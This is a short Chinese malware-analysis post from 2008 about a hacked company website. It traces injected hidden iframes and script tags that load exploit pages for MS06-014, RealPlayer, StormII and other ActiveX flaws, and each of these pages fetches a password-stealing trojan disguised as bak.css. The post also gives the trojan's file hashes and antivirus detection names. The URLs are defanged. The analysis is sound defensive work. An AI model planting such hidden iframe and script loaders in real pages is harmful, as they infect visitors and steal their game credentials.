某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
endurer 原创
2008-02-29 第1版
1.网站首页包含代码:
/---
<iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0></iframe>
---/
1.1 hxxp://pop**.i**ms**e*e*.cc/g3.htm 包含代码:
/---
<iframe src=news.html width=100 height=0></iframe>
---/
1.1.1 hxxp://pop**.i**ms**e*e*.cc/news.html 输出代码:
/---
<script src=hxxp://x**x*x.c**ka**bc*.net/ms06014.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html"></iframe>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/StormII.html"></iframe>
<sCrIpT LAnGuAgE="Javascript" src=hxxp://x**x*x.c**ka**bc*.net/real.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/Thunder.html"></iframe>
---/
1.1.1.1 hxxp://x**x*x.c**ka**bc*.net/ms06014.js
利用 MS06-014漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
bak.css其实是一个PE格式的可执行文件
文件说明符 : D:/test/bak.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-29 12:15:9
修改时间 : 2008-2-29 12:15:9
访问时间 : 2008-2-29 12:15:49
大小 : 11504 字节 11.240 KB
MD5 : 17de1eca74664e197a5614762d072b19
SHA1: 56EC3173D9C98552628E3C24688F520B430AC610
CRC32: ee46ca17
Kaspersky 已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.sbg 文件: D:/test/bak.css/PE_Patch/UPack
瑞星报为:Trojan.Win32.Undef.dkp
1.1.1.2 hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html
利用 联众世界的游戏大厅主程序GLWorld所安装的ActiveX控件(HanGamePluginCn18.dll,CLSID:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.3 hxxp://x**x*x.c**ka**bc*.net/StormII.html
利用 暴风影音2 组件mps.dll(clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.4 hxxp://x**x*x.c**ka**bc*.net/real.js
利用 RealPlayer 漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.5 hxxp://x**x*x.c**ka**bc*.net/Thunder.html
内容空白
1.1.1.6 利用 BaiduBar.Tool 下载 hxxp://x**x*x.c**ka**bc*.net/Baidu.cab
Baidu.cab 中的 Baidu.exe 与 bak.css相同。
京公网安备 11010802041100号